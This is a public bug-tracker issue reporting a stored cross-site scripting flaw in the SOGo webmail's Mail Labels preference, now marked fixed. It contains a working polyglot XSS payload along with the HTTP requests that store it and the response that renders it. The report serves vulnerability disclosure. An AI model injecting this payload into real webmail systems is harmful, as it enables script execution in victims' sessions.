View Issue Details

IDProjectCategoryView StatusLast Update
0006007SOGoWeb Preferencespublic2024-09-12 06:58
Reporterjulian123 Assigned Toqhivert  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
Platform[Server] LinuxOSUbuntuOS Version16.04 LTS
Product Version5.10.0 
Summary0006007: Stored-XSS in Mail Labels Field
Description

A cross-site scripting payload can be stored in the Mail Labels fields, leading to execution when the user navigates to their inbox.

Steps To Reproduce
  1. Authenticate to the application.
  2. Navigate to Preferences > Mail > Labels
  3. Select Create Label or modify an existing label to include the following payload
    //</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e
    1. Select Save
    2. Navigate to the user's inbox and observe the XSS payload execute.
Additional Information

POST /SOGo/so/john@123.com/Preferences/save HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.96/
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: ac1a2fd18ca6a5119b777957e01d6f71148f1317
Content-Length: 3866
Origin: http://192.168.2.96
DNT: 1
Sec-GPC: 1
Connection: keep-alive
...snip...

],"$label3":["Personal","#009900"],"$forwarded":["Forwarded","#B01FE3"],"label":["//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e","#aaa"]},

GET /SOGo/so/john@123.com/Preferences HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: 0xHIGHFLYxSOGo=

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Aug 2024 09:52:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 132477
Connection: keep-alive
Strict-Transport-Security: max-age=15768000;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin

...snip...
},"SOGoCalendarTasksDefaultClassification":"PUBLIC","SOGoPasswordRecoveryMode":"Disabled","SOGoCalendarDefaultReminder":"NONE","SOGoRefreshViewCheck":"manually","SOGoMailAutoSave":5,"SOGoMailLabelsColors":{"$label5":["Later", "#993399"],"$label2":["Work", "#FF9900"],"$label4":["To Do", "#3333FF"],"$label1":["Important", "#FF0000"],"label":["//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e", "#aaa"],

Tagsmail settings

Relationships

related to 0006010 closedqhivert Stored-XSS in Reply to Email 
related to 0006004 resolvedqhivert Stored-XSS in Contacts Category Fields 

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2024-08-19 23:59 julian123 New Issue
2024-08-19 23:59 julian123 Tag Attached: mail settings
2024-08-20 14:08 qhivert Relationship added related to 0006010
2024-08-20 14:08 qhivert Relationship added related to 0006004
2024-09-12 06:58 qhivert Assigned To => qhivert
2024-09-12 06:58 qhivert Status new => closed
2024-09-12 06:58 qhivert Resolution open => fixed